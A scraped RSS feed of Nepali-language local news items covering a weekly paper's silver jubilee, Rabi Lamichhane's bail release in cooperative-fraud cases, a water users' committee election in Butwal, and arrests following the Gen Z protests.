सुशासनको विट मार्फत यहाँबाट निरन्तर प्रकाशन हुँदै आएको पत्रिकाको रजत उत्सव समारोह निर्वतमान प्रतिनिधि सभा सदस्य डा. धवल शम्शेर राणाको प्रमुख आतिथ्यतामा भएको हो । प्रमुख अतिथि राणाले सुशासनको विटमा काम गर्ने पत्रिका आगामी दिनमा थप सशक्त रुपमा आउन जरुरी रहेको बताउनु भयो । भ्रष्टाचार गर्नेहरूलाई कुनै पनि अवस्थामा समाजबाट बहिष्करण गर्नुपर्नेमा उहाँको जोड थियो । समाजमा सुशासन कायम गर्न सञ्चार माध्यमको भूमिका महत्वपूर्ण हुने भन्दै उहाँले हरेक नागरिकको आवाज बन्न असल शासन पोष्टलाई शुभकामना दिनुभयो ।
रजत समारोहमा पत्रिकाले मनाएकोमा शुभकामना मन्तव्यका साथमा पत्रिका प्रकाशनमा निरन्तर सहयोग गर्ने व्यक्ति तथा संस्थालाई सम्मान र उत्कृष्ट पाठकलाई सम्मान गरिएको थियो । सो अवसरमा उत्कृष्ट बिज्ञापन दाताको रुपमा अमृत बुक्स एन्ड स्टेशनरी नेपालगन्ज र ब्राइटल्याण्ड स्कुल नेपालगन्जलाई सम्मान गरिएको थियो । यसैगरी उत्कृष्ट पाठकको रुपमा माइति नेपाल नेपालगञ्जमा प्रमुख केशब कोइराला र दिदी बहिनी समाज बाँकेका अध्यक्ष रमादेवी शाहलाई सम्मान गरिएको थियो । पत्रिका प्रकाशनको क्रममा सम्पादन समुहमा रहेर भूमिका निर्वाह गरेका पूर्व सह–सम्पादक भाइराजा श्रीवास्तब र ओविराज आचार्यलाई सम्मान गरिएको थियो । उहाँहरूलाई सम्मान पत्र र दोसल्ला सहित सम्मान गरिएको थियो ।
कार्यक्रममा पत्रकार महासँघका लुम्बिनी प्रदेशका अध्यक्ष शुक्रऋषी चौलागाईले असल शासन पोष्टको स्थापना कालदेखि परिचित रहेको भन्दै भ्रष्टाचार रहित पत्रकारितामा खरो उत्रिएको टिमलाई बधाई ज्ञापन गर्नु भयो । उहाँले निरन्तर पत्रिका प्रकाशनको शुभकामना दिनुभयो । यसैगरी शिक्षाविद् एवम् बास नेपालका सल्लाहकार किरण आचार्यले इच्छा र चाहनाले सफलता हासिल गर्न सक्छ भन्ने उदाहरण असल शासन पोष्ट रहेको बताउनु भयो । सुशासन कायम गर्न असल शासनले मोल्ने गरेको जोखिम प्रशंसायोग्य रहेको उहाँले उल्लेख गर्नुभयो । समाजसेवी जयकेश सिंहले सुशासनको क्षेत्रमा सुनामी ल्याउन सफल असल शासन पोष्टलाई बधाई र शुभकामना व्यक्त गर्नुभयो ।
बास नेपालका सल्लाहकार तथा अधिवक्ता लोकबहादुर शाहले असल शासन पोष्टले हरेक नागरिकलाई सुसूचित बनाएको बताउनु भयो । यसैगरी मंगलप्रसाद माविका प्रधानाध्यापक सध्या गुप्ताले सुशासन र पारदर्शी कार्य गर्ने व्यक्ति तथा संस्थाको साथमा असल शासन पोष्ट उभिएको देख्दा खुसी लागेको उल्लेख गर्नुभयो ।
उक्त कार्यक्रममा उद्योग बाणिज्य संघका पूर्वकेन्द्रीय सदस्य कृष्णप्रसाद श्रेष्ठले समाज रुपान्तरमा असल शासन पोष्ट साप्ताहिकले खेलेको भूमिका महत्वपूर्ण रहेको बताउनु भयो । कार्यक्रमका सम्मानित असल शासन पोष्टका पूर्व सहसम्पादक ओविराज आचार्यले असल शासन पोष्ट जस्तो निष्पक्ष पत्रिकाको हिस्सा बन्न पाएकोमा गौरवाम्बित रहेको स्मरण गर्नुभयो ।
उत्कृष्ट पाठकको रुपमा सम्मानित माइती नेपाल नेपालगञ्जका प्रमुख केशव कोइरालाले असल शासन पोष्टको प्रकाशनले समाजमा भइरहेको गलत कार्यहरू रोकिएको बताउनु भयो । उहाँले पत्रिकाको निरन्तर प्रकाशनको शुभकामना दिनुभयो । असल शासन पोष्ट साप्ताहिकका प्रबन्ध निर्देशक मन भण्डारीले सञ्चालन गर्नु भएको कार्यक्रममा स्वागत पोष्टका कार्यकारी सम्पादक हेमराज भट्टले गर्नु भएको थियो । त्यस्तै, बास नेपालका केन्द्रीय अध्यक्ष शिवकुमार बर्माले धन्यवाद ज्ञापन गर्नु भएको थियो ।
आयोजक तथा समारोहका अध्यक्ष एवम् सम्पादक नमस्कार शाहले असल शासन पोष्ट साप्ताहिकको प्रकाशन विगत र बर्तामानको बारेमा कार्यक्रमका बारेमा जानकारी दिदै समापन गर्नु भएको थियो । कार्यक्रममा विभिन्न क्षेत्रका १ सय जना बढीको सहभागिता रहेको थियो ।
]]>https://www.antaranganews.com/?feed=rss2&p=385540रास्वपा सभापति रवि रिहा : अन्यायको हिसाब मिलाउन बाँकी छ, तर तत्काल बोल्दिनँ
https://www.antaranganews.com/?p=37294
https://www.antaranganews.com/?p=37294#respondFri, 19 Dec 2025 15:11:48 +0000https://www.antaranganews.com/?p=37294भैरहवा– राष्ट्रिय स्वतन्त्र पार्टी (रास्वपा) का सभापति रवि लामिछानेले धरौटी बुझाएर छुट्नु भएको छ । यहाँ स्थित जिल्ला अदालत रुपन्देहीमा धरौटी रकम बुझाएर पुस ४ गते छुट्नु भएको छ ।
उच्च अदालत बुटवलले बैंक ग्यारेन्टीमा छाड्न हिजो आदेश दिएपछि उहाँ कागजी प्रक्रिया पूरा गर्न आज रुपन्देही जानु भएको थियो । लामिछाने कागजी प्रक्रिया पूरा गरेर रिहा भएका जिल्ला अदालत रुपन्देहीका सूचना अधिकारी पदम अर्यालले बताउनुभयो । उहाँका अनुसार कुल ३ करोड ७४ लाख ८४ हजार रुपैयाँ धरौटी बुझाएर रिहा हुनु भएको हो ।
कारागारमुक्त भएपछि उहाँले अन्यायको हिसाब मिलाउन बाँकी छ, तर तत्काल बोल्दिनँ भन्नुभयो । उहाँका अनुसार न्यायको लडाइँ बाँकी छ । उहाँले भन्नुभयो, ‘अहिले आफ्नो बोल्ने समय आइसकेको छैन, अन्यायको हिसाब मिलान भएपछि धेरै बोल्ने छ ।’
रविले आफूमाथि भएको अन्याय देशमाथि भएको अन्यायको तुलनामा केही पनि नभएको उल्लेख गर्नुभयो । उहाँले थप भन्नुभयो, ‘न्यायको यो लडाइँ मेरो बाँकी नै छ, मैले अझ धेरै लड्नु छ र मैले अहिले लड्नुपर्छ लड्न बाँकी छ भनेको मेरा लागि भनेको होइन तपाईंका लागि यो देशको न्यायका लागि लड्नुपर्ने छ भनेको हो, यिनीहरूले यो देश माथि गरेको अन्यायको अगाडि म माथि गरेको अन्याय केही पनि होइन, त्यो सबको हिसाब गर्नुछ । त्यसको हिसाब मिलाएपछि अलि लामो बोलौंला, आजलाई म यति मात्र भन्छु कि हिसाब मिलाउन बाँकी नै छ, न्याय पाउन बाँकी नै छ ।’
रविले चुनाव लड्न पाउने ः
रास्वपाका सभापति रवि रिहा भएसँगै उहाँले चुनाव लड्नु पाउनु होला कि नहोला ? भन्ने जिज्ञासा समेत उठिरहेको छ । उहाँको मुद्दा बिचाराधिन अवस्थामा भएका कारणले उहाँले आउँदो फागुन २१ गते हुने आमनिर्वाचनमा भाग लिन, अर्थात चुनाव लड्न पाउनु हुन्छ ।
प्रतिनिधिसभा सदस्य निर्वाचन ऐन २०७४ को दफा १३ ले विभिन्न १० वटा अवस्थामा चुनाव लड्न अयोग्य हुने भनेको छ । जस अन्तर्गत भ्रष्टाचार, जबरजस्ती करणी, मानव बेचबिखन तथा ओसारपसार, लागू औषध विक्री वितरण तथा निकासी वा पैठारी, सम्पत्ति शुद्धीकरण, राहदानी दुरुपयोग, अपहरणसम्बन्धी कसुर वा नैतिक पतन देखिने अन्य फौजदारी कसुरमा सजाय पाई वा कुनै कसुरमा जन्म कैद वा बिस वर्ष वा सोभन्दा बढी कैदको सजाय पाई त्यस्तो फैसला अन्तिम भएको अबस्थामा मात्रै अयोग्य हुने भनेको छ ।
काठमाडौंबाट हवाईजहाजमा भैरहवा आउने तयारी भएपनि खराब मौसमका कारण लामिछाने चितवनसम्म जहाजमा आएर त्यहाँबाट सडकमार्गबाट सांझ पौने ६ बजे मात्र भैरहवा कारागार पुग्नु भएको थियो ।
रवि भैरहवा कारागार आइपुग्दा र छुटेपछि रास्वपाका नेता कार्यकर्ता र समर्थकहरुले उहाँको पक्षमा हुटिङ गर्दै खुशियाली मनाएका छन् ।.
]]>https://www.antaranganews.com/?feed=rss2&p=372940रास्वपाका सभापति रवि रिहा हुने बाटो खुल्यो : भोलिमात्र कारगार मुक्त हुने
https://www.antaranganews.com/?p=37290
https://www.antaranganews.com/?p=37290#respondThu, 18 Dec 2025 14:24:37 +0000https://www.antaranganews.com/?p=37290काठमाडौं– राष्ट्रिय स्वतन्त्र पार्टी (रास्वपा)का सभापति रवि लामिछानेलाई थुनामुक्त गर्न उच्च अदालत तुलसीपुरको बुटवल इजलासले आदेश गरेको छ । बिगोबमोजिमको धरौटी स्वीकार गर्दै पुस ३ गते उहाँलाई रिहाईको आदेश दिएको हो । तर रवि भोलिमात्र कारागार मुक्त हुनुहुने भएको छ । रवि भोलि मात्र छुट्ने :
रास्वपाका केन्द्रीय सदस्य हरि ढकालले छुट पुर्जी नभएकोले उहाँ भोलि मात्र छुट्ने बताउनु भएको हो । उहाँका अनुसार ‘छुट पुर्जी चाहिने र जिल्ला अदालतबाट भोलि मात्र पुर्जी आउने हुँदा भोलि यहाँबाट भैरहवामा छुट पुर्जी लिन जानु हुनेछ । त्यसैले भोलि मात्र छुट्ने हुनुभयो ।
न्यायाधीशद्वय वासुदेव आचार्य र तेजनारायण पौडेलको इजलासले लामिछानेले दिएको ७३ नम्बर निवेदनबमोजिम दुई करोड ७४ लाख ८४ हजार धरौटी स्वीकार गर्ने आदेश गरेको आदेशमा उल्लेख छ ।
रविको निवेदनमा ‘सहकारी ऐनको दफा १३१ बमोजिम धरौटी राखी साधारण तारेखमा रिहा हुन पाउँ’ भनिएको छ । तर, उच्च अदालतले भने सहकारी ऐनमा नै नटेकी फौजदारी संहिताको दफा ७१ बमोजिम हुने गरी आदेश गरेको छ । फौजदारी संहिताको दफा ७१ ले पनि अभियुक्तले सफाइ पाउने तहको प्रमाण फेला परेको हकमा मात्र बिगोबमोजिमको धरौटी स्वीकार गर्ने स्पष्ट व्यवस्था गरेको उल्लेख छ ।
फौजदारी संहिताको दफा ७१ (२) मा भनिएको छ, ‘दफा ६७ वा दफा ६८ बमोजिम थुनामा परेको कुनै अभियुक्त ‘कसुरदार होइन भन्ने प्रमाणित हुन सक्ने कुनै मनासिब आधार प्राप्त हुन आएमा’ मुद्दाको कारबाही जुनसुकै अवस्थामा पुगेको भए पनि त्यस्तो विषयमा सुनुवाइ गरी अदालतले निजलाई थुनाबाट छोड्ने आदेश दिन सक्नेछ ।’
सहकारी ऐनको दफा १३१ (२)मा भनिएको छ, ‘उपदफा (१) मा जुनसुकै कुरा लेखिएको भए तापनि प्रचलित कानुनबमोजिम मिलापत्र हुन नसक्ने ‘संगठित अपराध’, सम्पत्ति शुद्धीकरण र अन्य फौजदारी कसुरसँग सम्बन्धित मुद्दामा मिलापत्र गर्न सकिने छैन ।’ भनिएको छ ।
उच्च अदालत तुलसीपुरको बुटवल इजलासको आदेशमा भनिएको छ, ‘ … निवेदक प्रतिवादी रवि लामिछानेको निवेदनका सन्दर्भमा विचार गर्दा निजले आफू कार्यरत रहेको संस्थामा सुप्रिम सहकारीबाट रकम प्रवाह भएको बिगोमध्ये दामासाहीले हुने बिगो बैंक ग्यारेन्टी राखी मुलुकी फौजदारी कार्यविधि संहिता, २०७४ को दफा ७१ अनुसार बैंक ग्यारेन्टी लिई मुद्दाको पुर्पक्ष गरीपाउँ भन्ने देखिन्छ, प्रतिवादीले बिगोको हकमा दामासाहीले हुने रकम जमानत दिई बचतकर्ताको बिगो प्राप्त गर्ने सुनिश्चितता गरेको देखियो । बचत कर्ता तथा लगानीकर्ताको रकम सुनिश्चितता नै पहिलो प्राथमिकता देखिँदा निजले दिएको बैंक जमानत निम्न शर्तमा स्वीकार गरी मुद्दाको कारवाही अगाडी बढाउनु ।’ यस्ता छन् सर्त
१. सुरु जिल्ला अदालतले मिति २०८१/१०/१३ मा सुरु थुनछेकको क्रममा माग गरेको धरौटी रकम दफा ६८ अनुसार स्वीकार गर्ने ।
२. प्रतिवादीले निवेदन साथ पेस गरेको बैंक जमानत (ग्यारेन्टी) रु. २,७४,८४,०००।– बिगोका हकमा सुरक्षित गर्ने ।
३. प्रतिवादी व्यक्तिगत वा संस्थागत रूपमा विदेश यात्रा गर्नु परेमा अदालतलाई पूर्वजानकारी दिने ।
४. सुरु जिल्ला अदालतको मिति २०८२/४/२६ को आदेश बदर गरिदिएको छ ।
५. अदालतबाट फैसला हुँदा ठहरेबमोजिम हुने नै हुँदा, साथै फैसलाले बिगोका हकमा थप दायित्व सृजना गरेमा तिर्न बुझाउन मञ्जर भए सोको कागज गरी प्रतिवादी रवि लामिछानेलाई प्रस्तुत मुद्दाको रोहबाट थुनामुक्त गर्नु ।
रविलाई २ करोड ६८ लाख रुपैयाँ जमानतवापत राख्न र त्यो राखेमा थुनामुक्त गर्न आदेश दिएको हो । त्यो वापत उच्च अदालतले थप एक करोड रुपैयाँ धरौटी राख्नसमेत आदेश दिएको उच्च अदालत बुटवलका सूचना अधिकारी रामबहादुर कुँवरले बताउनु भयो । उहाँका अनुसार न्यायाधीश बासुदेव आचार्य र तेजनारायण पौडेलको इजलासमा उनीहरूको मुद्दाको सुनुवाइ भएको हो । रविको थुनमुक्त हुने प्रक्रिया कस्तो छ ?
उच्च अदालत बुटवलले रवि लामिछानेलाई बिगो र धरौटी बैंक ग्यारेन्टी पेश गरे थुनामुक्त गर्ने आदेश दिएको छ ।
जिल्ला अदालत रुपन्देहीले उच्च अदालतको आदेश प्राप्त गरी बिगो र धरौटी रकम रुजु गरी कारागार प्रशासनलाई थुनामुक्तिका लागि चिठी लेख्नेछ ।
कारागार प्रशासनले चिठी पाएपछि लामिछानेलाई जिल्ला अदालतमा बुझाएर बिगो र जरिवाना बुझाउने कागजमा हस्ताक्षर गराएर थुनामुक्त गर्ने प्रक्रिया पुरा गर्नेछ । आदेशअनुसार बैंक ग्यारेन्टी बुझाएपछि रवि थुनामुक्त हुुनुहुनेछ । रवि लामिछानेको चार अदालतमा धरौटी कति ?
रास्वपाका सभापति रविले चारवटा अदालतमा ५ करोड २७ लाख धरौटी बुझाइसकेको स्थिति छ । उहाँलाई आज उच्च अदालत बुटवल इजलासले २ करोड ६८ लाख रुपैयाँ जमानतबापत राख्न र त्यो राखेमा थुनामुक्त गर्न आदेश दिएको हो । त्यो बापत उच्च अदालतले थप एक करोड रुपैयाँ धरौटी राख्न समेत आदेश दिएको छ । २०८१ माघ ६ गते उहाँसहित २२ जनालाई प्रतिवादी बनाएर जिल्ला अदालतमा पूरक अभियोगपत्र दर्ता गरिएको थियो । जहाँ ५५ करोड ५९ लाख ८३ हजार ८ सय ४२ रुपैयाँ बिगो मागदाबी गरिएको छ । रविउपर मात्र व्यक्तिगत दुई करोड रुपैयाँ पनि बिगो दाबी गरिएको थियो ।
२०८० वैशाख ३ मा सुप्रिमको बचत अपचलनमा २८ जनाविरुद्ध ८६ करोड १८ लाख २३ हजार ७ सय ५४ रुपैयाँ बिगो कायम गरी सहकारी ठगीमा मात्र मुद्दा दायर गरिएको थियो । यसअघि लामिछाने काठमाडौँ, कास्की र चितवन जिल्ला अदालतबाट धरौटीमा रिहा हुनु भएको हो ।
रविले कास्कीको सूर्यदर्शन सहकारीमुद्दामा ६५ लाख धरौटी बुझाउनु भएको छ भने उक्त मुद्दामा जिल्ला अदालत कास्कीका न्यायाधीश नितिज राईको इजलासले २०८१ पुस २५ गते ६५ लाख धरौटी माग गर्ने आदेश दिएको थियो । सरकारी वकिलको कार्यालय कास्कीले २०८१ पुस ७ गते जिल्ला अदालत कास्कीमा तीनवटा मुख्य अभियोग दाबी गर्दै उहाँविरुद्ध मुद्दा दायर गरेको थियो । रविसँग सहकारी ठगी गरेको कसुरमा मात्रै ३ करोड ३७ लाख ६५ हजार रुपैयाँ बिगो मागदाबी भएको थियो ।
सम्पत्ति शुद्धीकरणमा २७ करोड ८९ लाख ४४ हजार ७०५ रुपैयाँ स्रोत नखुलेको भन्दै सोही बराबर बिगो मागदाबी गरिएको थियो । सम्पत्ति शुद्धीकरण ऐन २०६४ को दफा २७ अनुसार मुद्दा दायर भएपछि उहाँको संसद् पद निलम्बन गरिएको थियो । काठमाडौँको स्वर्णलक्ष्मीको मुद्दामा ६० लाख धरौटी :
काठमाडौँको स्वर्णलक्ष्मी सहकारीका साढे ५ हजार बचतकर्ताको १ अर्ब १९ करोड संगठित रूपमा ठगी गरेको अभियोगमा २०८१ पुस २१ मा रविसहित ३९ जनाविरुद्ध मुद्दा दायर भएको थियो । काठमाडौं जिल्ला अदालतका न्यायाधीश माधवप्रसाद अधिकारीको एकल इजलासले लामिछानेलाई २०८१ माघ २ गते ६० लाख धरौटीमा रिहा गर्ने आदेश गरेको थियो । चितवनको सहारा सहकारीमा ५४ लाख धरौटी :
सहारा चितवन सहकारी ठगीको अभियोगमा रविसँग ५४ लाख रुपैयाँ धरौटी माग्ने आदेश भएको थियो । चितवन जिल्ला अदालतका न्यायाधीश दयाराम ढकालको इजलासले लगातार रविसँग धरौटी माग गर्ने आदेश दिएको थियो । अदालतले माग गरेको धरौटी बुझाएर उहाँ रिहा हुनु भएको थियो । पर्साको सानोपाइलाको अनुसन्धानमा :
यसैबीच, स्थानीय सानोपाइला साकोस ठगीको जाहेरीमा पनि उहाँउपर अनुसन्धान भइरहेको जनाएको छ । गत मंसिर २५ गते रविले पर्सा पुगेर सानोपाइला सहकारी ठगीमा बयान दिइसक्नु भएको छ । पर्सामा लामिछानेसहित १४ जनाविरुद्ध जिल्ला अदालतले पक्राउ पुर्जी जारी गरेको थियो । मंसिर १९ मा उहाँविरुद्ध जिल्ला अदालतबाट पक्राउ पुर्जी जारी भएको थियो । सो सहकारीका पूर्वसञ्चालक तथा संरक्षक जीबी राई हुन् । तत्कालीन वीरगञ्ज उपमहानगरपालिकाको ८, १३, १४, १८ र १९ नम्बर वडा कार्यक्षेत्र रहेको सानो पाइला सहकारीले करिब ८ सय बचतकर्ताको १ अर्ब ३५ करोड रुपैयाँ बचत हिनामिना गरेको दावी छ ।
यसअघि २०८१ माघ १३ गते रुपन्देही जिल्ला अदालतका न्यायाधीश प्रह्लादकुमार योगीको इजलासले एक करोड रुपैयाँ धरौटीमा रविलाई रिहा गर्न आदेश गरेपछि त्यहाँ पनि बैंक ग्यारेन्टी राखेर उहाँ रिहा हुनु भएको हो । उहाँलाई धरौटीमा छाड्ने सो आदेशविरुद्ध उच्च अदालत बुटवल इजलासले पुर्पक्षका लागि थुनामा पठाउने आदेश दिएको थियो । पुर्पक्षका लागि थुनामा पठाउने आदेशविरुद्ध सर्वोच्च अदालतले पनि उच्चकै आदेश सदर गरेपछि उहाँलाई जेल चलान गरिएको थियो ।
स्मरणीय छ, रास्वपाका सभापति रवि उल्लेखित कुनै पनि सहकारीको सदस्य बनेको, सञ्चालक भएको वा आफैले माग गरेर ऋण लिएको स्थिति भने आजका दिनसम्म पुष्टि हुन सकेको छैन । यसैले पनि उहाँउपर राजनीतिक प्रतिशोध साधिएको हो भन्ने बुझ्न कठिन हुँदैन ।
]]>https://www.antaranganews.com/?feed=rss2&p=372900मोतिपुर–सेमलार खानेपानीको चुनावमा रास्वपालाई दुई तिहाई बहुमत : कांग्रेस–एमाले गठबन्धन सफाचट
https://www.antaranganews.com/?p=36711
https://www.antaranganews.com/?p=36711#respondSun, 16 Nov 2025 03:14:38 +0000https://www.antaranganews.com/?p=36711बुटवल– बुटवलको मोतिपुर– सेमलार खानेपानी सरसफाई तथा उपभोक्ता संस्थाको चुनावमा राष्ट्रिय स्वतन्त्र पार्टी (रास्वपा)को प्यानलले नेपाली कांग्रेस र नेकपा एमालेको संयुक्त गठबन्धनलाई पराजित गरेको छ । चुनावी परिणाम अनुसार रास्वपाको प्यानलले नेपाली कांग्रेस र नेकपा एमालेको संयुक्त गठबन्धनलाई सफाचट जस्तै गरी दिएको हो । १४ सदस्यीय कार्यसमितिमा अध्यक्ष, सचिव सहित ११ पटमा रास्वपाले जितेको कार्तिक २८ गते राती घोषणा गरिएको हो ।
रास्वपाले उपाध्यक्ष, सहसचिव र एक सदस्यबाहेक सबै पद जितेको हो ।
बुटवल उपमहानगरपालिकाको वडा नं १४, १५ र १९ का १७ सय उपभोक्ता रहेको निर्वाचनमा १० धारा बराबर एकजना परिषद् सदस्यका दरले १७१ मतदाता रहेको निर्वाचन समितिका संयोजक अधिवक्ता जोखबहादुर खत्रीले बताउनु भयो । उहाँका अनुसार अध्यक्षमा रास्वपाका कृष्ण थापाले ८८ मत पाएर निर्वाचित हुनु भयो भने गठबन्धनबाट नेपाली कांग्रेसका नरबहादुर मल्ल ७५ मत पाएर पराजय भोग्नु भएको छ । मल्ल बुटवल उपहानगरपालिका– १४ का कांग्रेस वडा सभापति समेत हुनुहुन्छ ।
वरिष्ठ उपाध्यक्षमा गंगाबहादुर पौडेल, उपाध्यक्षमा शंकर पौडेल, सचिवमा मधुप्रसाद घिमिरे, कोषाध्यक्षमा छत्रबहादुर खत्री र सहसचिवमा पृथबहादुर थापा निर्वाचित हुनु भएको छ । यसैगरी, महिला सदस्यहरूमा राधा कार्की खांण र सीता बस्नेत, अन्य सदस्यहरूमा राजकुमार गौतम र हरिप्रसाद खनाल विजयी हुनु भएको छ । लिलाधर दंगोरिया थारु गोलाप्रथाबाट निर्वाचित हुन सफल हुनु भएको निर्वाचन समितिका संयोजक खत्रीले जानकारी दिनुभयो ।
उहाँका अनुसार आन्तरिक लेखा समिति संयोजकमा विष्णुप्रसाद पाण्डे तथा सदस्यमा लक्ष्मण सेन निर्वाचित हुनु भएको छ । महिला सदस्यमा सरस्वती बुढा गोलाप्रथाबाट निर्वाचित भएको निर्वाचन समिति संयोजक खत्रीको भनाइ छ ।
रास्वपाबाट निर्वाचित सचिव मधुप्रसाद घिमिरेले आफूहरूले उपभोक्ताको संस्थामा दुई ठूला दलले सिन्डिकेट नगरी सबै दलको सहमतिमा नेतृत्व चयनको प्रस्ताव राख्दा आफूहरूलाई १० मत पनि नभएको दल भनेर होच्याउने काम गरेपछि आफूहरूले चुनावी प्रतिस्पर्धामा उत्रिएको बताउनु भयो ।
उहाँले भन्नुभयो, ‘रास्वपाको प्यानललाई दलगत समर्थन कसैको नरहेको तर परिवर्तनशील मतदाताको समर्थन रहेका कारण आफूहरूको जीत भएको हो ।’
स्मरणीय छ, यसअघि ५ हजार मतदाता रहेको बुटवलकै नयाँगाउँ खानेपानी संस्थामा पनि रास्वपाले कांग्रेस एमाले गठबन्धनलाई चुनौती दिएको थियो । जहाँ रास्वपाको प्यानल ५७ मतको झिनो अन्तरले पराजित भएको थियो ।
]]>https://www.antaranganews.com/?feed=rss2&p=367110जेन जेड आन्दोलन : उच्छृङ्खल गतिविधि गर्ने मात्र ३३५ जना पक्राउ
https://www.antaranganews.com/?p=36413
https://www.antaranganews.com/?p=36413#respondSun, 02 Nov 2025 14:15:24 +0000https://www.antaranganews.com/?p=36413काठमाडौँ– जेन जेड आन्दोलनको क्रममा उच्छृङ्खल गतिविधि गर्ने आजका मितिसम्म प्रहरीले मात्र ३३५ जना पक्राउ गरेको छ । प्रदर्शनको आवरणमा भदौ २४ गते संसद् भवनमा आगजनी गर्ने र प्रहरीको हतियार लुट्नेहरूलाई प्रहरीले धमाधम पक्राउ गरिरहेको छ । देशभरबाट अहिलेसम्म ३३५ जनालाई पक्राउ गरिएको प्रहरी प्रवक्ता (डीआईजी) विनोद घिमिरेले कार्तिक १६ गते जानकारी दिनु भएको हो ।
देशभरका २० जिल्लामा आरोपी ३३५ जनालाई पक्राउ गरेर अनुसन्धान गरिरहेको उहाँको भनाइ छ । उहाँका अनुसार काठमाडौँ उपत्यका, धनुषा, पर्सा, बारा, चितवन, धादिङ, काभ्रे, पर्वत, म्याग्दी, कास्की र बाँकेमा उच्छृङ्खल गतिविधि गर्नेहरूलाई पक्राउ गरेर अनुसन्धान गरिरहेको जनाएको छ । पक्राउ परेकाहरूमाथि प्रहरीले ६ वटा मुद्दामा अनुसन्धान गरिरहेको छ । उहाँले भन्नुभयो, ‘देशभर १२९ वटा जाहेरी दर्ता गरेर ६ वटा मुद्दामा अनुसन्धान भइरहेको छ ।’
आगजनी, लुट र हत्यामा संलग्नहरूलाई प्रहरीले आपराधिक उपद्रव, कर्तव्य ज्यान, अभद्र व्यवहार, चोरी, हातहतियार र कारागार ऐन– २०७९ अनुसारको कसुरमा अनुसन्धान गरिरहेको छ । कारागारबाट कैदी भगाउनेलाई कारागार ऐन अनुसार कानुनी कारबाही हुने व्यवस्था छ ।
काठमाडौँ जिल्लामा प्रहरीले १३० जनालाई पक्राउ गरेको थियो । पक्राउ गरिएका मध्ये ७० जनालाई हाजिर जमानीमा छाडिएको जिल्ला प्रहरी परिसर काठमाडौँका एसएसपी रमेश थापाले बताउनु भयो । उहाँका अनुसार ५४ जनालाई हिरासतमा राखेर अनुसन्धान गरिरहेका छौँ ।
काठमाडौँ महानगरपालिका– ६ गते तेन्जिङ दावा लामाले नागरिकताको सिफारिस लिएको भेटिएको छैन । तेन्जिङ समूहका बुलेट बाइक चढ्ने युवाहरू भदौ २३ र २४ मा भएको प्रदर्शनमा काठमाडौँको बिजुलीबजार स्थित पुलबाट प्रदर्शनमा सहभागी भएको भिडियो फुटेजमा देखिन्छ । उनीहरू सबैको ज्याकेटमा टीओबी लेखिएको थियो । टीओबीको अर्थ ‘तिब्बतियन ओरिजनल ब्लड’ हुन्छ ।
बौद्ध बस्दै आएका उनले महानगरपालिका– ६ बौद्धमा २०६३ चैत १० मा जन्मदर्ता गरेको विवरण सार्वजनिक भएको छ । तर, त्यसदिन शनिबार भएको हुनाले कसरी जन्मदर्ता भयो भन्नेबारे प्रश्न उठेको छ । तेन्जिङले टीओबी बाइकर्स समूह भएको र आफूहरू तिब्बतियन मूलको नेपाली भएको बताएका छन् । प्रहरीको बयानमा उनले भनेका छन्, ‘म आधा तिब्बतियन हुँ ।’
जेन जेड प्रदर्शनमा ‘टीओबी’को टिसर्ट लगाएर उच्छृङ्खल गतिविधि गर्ने तेन्जिङ दावा लामा असोज २६ गते पक्राउ परेका हुन् । दावाको समूहले बुलेट मोटरसाइकल पड्काउँदै बिजुलीबजारबाट भिडलाई उत्तेजित बनाउने काम गरेएका थिए । लामाले जिल्ला प्रशासन कार्यालयबाट लिएको नागरिकताको विवरण फेला नपरेपछि प्रहरीले उनीमाथि नागरिकताबारे पनि अनुसन्धान गरिरहेको छ ।
जेन जेड आन्दोलनमा प्रदर्शनकारीको आक्रमणबाट प्रहरी वृत्त महाराजगञ्ज र कोटेश्वरमा ३ जना प्रहरीले ज्यान गुमाए । महाराजगञ्जमा कार्यरत दुईजना प्रहरीको हत्यामा संलग्न आरोपमा प्रहरीले अहिलेसम्म ९ जनालाई पक्राउ गरेको छ । कोटेश्वरमा प्रहरीको हत्या गर्ने एकजना पक्राउ परेका छन् ।
महाराजगञ्जमा प्रहरीलाई कुटपिट गरेर हत्या गरेको आरोपमा गोरखा घर भएका २१ वर्षीय सोम गुरुङ, तनहुँ घर भएका २१ वर्षीय राजीव गुरुङ र २१ वर्षीय युनिक श्रेष्ठ , सर्लाही घर भएका १७ वर्षीय सुमित तितुङ, रामेछाप घर भएका १६ वर्षीय दीपक मगर काठमाडौँ प्रहरीको हिरासतमा छन् ।
काठमाडौँ जिल्ला अदालतको आदेशले महाराजगञ्जमा प्रहरीको हत्यामा संलग्न ४ जना आरोपीहरू यसअघि नै पुर्पक्षका लागि कारागार चलान भएका थिए । अदालतको आदेशपछि कारागार चलान हुनेहरूमा युवराज क्याप्छाकी, सोनाम तामाङ भन्ने बुद्धिलाल थिङ, होम प्रसाद पौडेल र टिकाराम बिक छन् ।
कोटेश्वरमा प्रहरीलाई हत्या गरेको आरोपमा कैलाली घर भएका १९ वर्षीय अनुपम भण्डारीलाई प्रहरीले पक्राउ गरेर अनुसन्धान गरिरहेको छ ।
भदौ २३ गते भएको जेन जेड प्रदर्शनमा प्रहरीको गोली लागेर २२ जना प्रदर्शनकारीको मृत्यु भएपछि भोलिपल्ट उच्छृङ्खल गतिविधि गर्नेहरूले आगजनी र तोडफोड गरे । उपत्यका र उपत्यका बाहिरका जिल्लामा पनि सार्वजनिक र निजी भवनमा आगजनी तथा तोडफोड गरिएको थियो ।
बुढानीलकण्ठ स्थित शेर बहादुर देउवाको घरबाट बुद्धको मूर्ति र शङ्ख चोरेको आरोपमा विजय लामा पक्राउ परेका छन् । २९ वर्षीय लामा चितवनको कालिका नगरपालिका– ६ टाँडीका स्थानीय हुन् । भदौ २४ मा देउवा दम्पतीमाथि आक्रमण हुँदा त्यहाँ पुगेका लामाले मूर्ति र शङ्ख चोरेर भागेको प्रहरीको अनुसन्धान निष्कर्ष छ । काठमाडौँको पेप्सीकोलाबाट पक्राउ परेका लामाको डेराबाट प्रहरीले बुद्ध मूर्ति, गणेशको मूर्ति र शङ्ख बरामद गरेको जनाएको छ ।
सो क्रममा पक्राउ परेका व्यक्तिहरूमाथि प्रहरीले ६ वटा मुद्दामा अनुसन्धान गरिरहेको छ । देशभर १२९ वटा जाहेरी दर्ता गरेर ६ वटा मुद्दामा अनुसन्धान भइरहेको डीआईजी घिमिरेले जानकारी दिनु भयो ।
